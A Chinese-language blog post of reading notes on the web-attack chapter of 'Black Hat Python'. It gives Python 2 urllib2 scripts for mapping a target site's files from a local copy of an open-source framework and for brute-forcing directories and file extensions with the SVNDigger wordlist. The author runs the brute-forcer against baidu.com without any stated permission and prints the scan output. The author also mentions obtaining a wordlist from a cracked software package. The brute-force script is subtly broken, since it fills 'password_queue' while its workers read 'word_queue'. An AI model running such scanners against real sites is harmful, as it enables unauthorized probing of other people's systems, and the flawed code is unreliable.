读书笔记 -《Python 黑帽子》 ( 四 )

来源：互联网发布：nba1415赛季总决赛数据编辑：程序博客网时间：2024/06/02 08:52

读书笔记系列文章

一直都在读书，读了忘，忘了再读。不如把每次学到的东西都写下来

第五章 Web 攻击

Web 的套接字函数库： urllib2

第二章的明星： Paramiko
第三章的明星： socket
第四章的明星： Scapy
第五章的明星： urllib2
这一节就看看这个 urllib2 库
urllib2库是一个非常要用的 http 客户端库，使用该库做 url 请求的时候，可以设置代理、超时时间、header、Redirect、Cookie、使用 HTTP 的 PUT 和 DELETE 方法、得到 HTTP 的返回码、解析表单等等等等，功能不可谓强大。
作者在这一节介绍了基本的使用方法，用 urllib2访问网页

import urllib2url = 'http://www.baidu.com'headers = {}headers['User-Agent'] = 'Googlebot'request = urllib2.Request(url, headers=headers)response = urllib2.urlopen(request)print response.geturl()print response.read()response.close()

开源 Web 应用安装

这一节的目的是爬取一个使用开源框架的网站的所有文件。
为什么攻击对象是开源网站？
原因很简单，攻击者可以在本地使用相同的框架创建一个模拟的网站，这样攻击者就能了解网站文件目录的层次结构，然后按照这个结构，去爬取指定网站的文件。

这一节的代码，作者强调了一个地方，就是使用了 Queue。写多线程的人基本都会用这个东西，因为线程安全。这一节作者用 Queue 来存储要爬取的 url，然后开启多线程，每个线程都是从 Queue 里面拿 url，然后干活。

说到开源框架，作者提到了 Joomla, WordPress, Drupal，但是为什么没提到 Django， Ghost。要想实验这一节的代码，起码得安装其中的一个，我只安装了 Ghost，还没测试。
代码如下

import Queueimport threadingimport osimport urllib2threads = 10target = "http://www.test.com"directory = "/Users/justin/Downloads/joomla-3.1.1"filters = [".jpg", ".gif", "png", ".css"]os.chdir(directory)web_paths = Queue.Queue()for r, d, f in os.walk("."):    for files in f:        remote_path = "%s/%s" % (r, files)        if remote_path.startswith("."):            remote_path = remote_path[1:]        if os.path.splitext(files)[1] not in filters:            web_paths.put(remote_path)def test_remote():    while not web_paths.empty():        path = web_paths.get()        url = "%s%s" % (target, path)        request = urllib2.Request(url)        try:            response = urllib2.urlopen(request)            content = response.read()            print "[%d] => %s" % (response.code, path)            response.close()        except urllib2.HTTPError as error:            # print "Failed %s" % error.code            passfor i in range(threads):    print "Spawning thread: %d" % i    t = threading.Thread(target=test_remote)    t.start()

暴力破解目录和文件位置

暴力破解其实就是在不知道任何消息的情况下，使用遍历字典的方式，挨个的式，反正有时间。
这些字典可以找开源项目下载。作者提供了两个，DirBuster 和 SVNDigger，还有下一章要介绍的web 进攻神器 Burp Suite。
https://www.netsparker.com/blog/web-security/svn-digger-better-lists-for-forced-browsing/
https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
这一节，作者利用 SVNDigger 提供的字典，来对目标网站进行暴力扫描下载，从上面的网址下载 all.txt文件作为字典。
这一段代码我试了一下，把攻击网站改为 baidu

import urllib2import urllibimport threadingimport Queuethreads = 5target_url = "http://www.baidu.com"wordlist_file = "all.txt"  # from SVNDiggerresume = Noneuser_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"def build_wordlist(wordlist_file):    # read in the word list    fd = open(wordlist_file, "rb")    raw_words = fd.readlines()    fd.close()    found_resume = False    words = Queue.Queue()    for word in raw_words:        word = word.rstrip()        if resume is not None:            if found_resume:                words.put(word)            else:                if word == resume:                    found_resume = True                    print "Resuming wordlist from: %s" % resume        else:            words.put(word)    return wordsdef dir_bruter(extensions=None):    while not word_queue.empty():        attempt = word_queue.get()        attempt_list = []        # check if there is a file extension if not        # it's a directory path we're bruting        if "." not in attempt:            attempt_list.append("/%s/" % attempt)        else:            attempt_list.append("/%s" % attempt)        # if we want to bruteforce extensions        if extensions:            for extension in extensions:                attempt_list.append("/%s%s" % (attempt, extension))        # iterate over our list of attempts                for brute in attempt_list:            url = "%s%s" % (target_url, urllib.quote(brute))            try:                headers = {}                headers["User-Agent"] = user_agent                r = urllib2.Request(url, headers=headers)                response = urllib2.urlopen(r)                if len(response.read()):                    print "[%d] => %s" % (response.code, url)            except urllib2.HTTPError, e:                if e.code != 404:                    print "!!! %d => %s" % (e.code, url)                password_queue = build_wordlist(wordlist_file)extensions = [".php", ".bak", ".orig", ".inc"]for i in range(threads):    t = threading.Thread(target=dir_bruter, args=(extensions,))    t.start()

运行结果，竟然每个网址都有。原来百度对于不存在的网址返回的不是4xx，而是一个3XX 的跳转，urllib2自动下载了这个跳转后的网页，这个跳转后的网页是百度的一个错误提示网页，对于代码来说，跟正常网页一样，所以输出的状态码是200。所以这个攻击代码需要改一改，需要判断一下 response 的 url 和我们指定的 url 是不是一样，幸好 urllib2提供了这样的功能。在原来的代码里面加入这么一句判断就行了 if response.geturl() == url:

[200] => http://www.baidu.com/root/[200] => http://www.baidu.com/CVS/[200] => http://www.baidu.com/common/[200] => http://www.baidu.com/Entries/[200] => http://www.baidu.com/lang/[200] => http://www.baidu.com/root.php[200] => http://www.baidu.com/Entries.php

$ curl http://www.baidu.com/root/ -iHTTP/1.1 302 FoundVia: 1.1 TMG3Connection: Keep-AliveProxy-Connection: Keep-AliveContent-Length: 222Expires: Sat, 20 Feb 2016 02:33:59 GMTDate: Fri, 19 Feb 2016 02:33:59 GMTLocation: http://www.baidu.com/search/error.htmlContent-Type: text/html; charset=iso-8859-1Server: ApacheCache-Control: max-age=86400<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.baidu.com/search/error.html">here</a>.</p></body></html>

暴力破解 html 表格认证

这一节作者分析了 Joomla 的登录 html，然后用 urllib2和 HTMLParser进行暴力破解，由于字典文件暂时还没有下载下来，也没有安装 Joomla, 回头再试试这个代码。
字典文件从 http://www.oxid.it/cain.html 下载，等网络条件好一点再下载。
Joomlak看起来还不错，回家后试一试
没翻墙，先下载一个破解后的绿色包（http://www.wmzhe.com/soft-18663.html），在里面找到了 wordlist.txt文件，估计就是这个了。
这里留一个 # TODO

1 0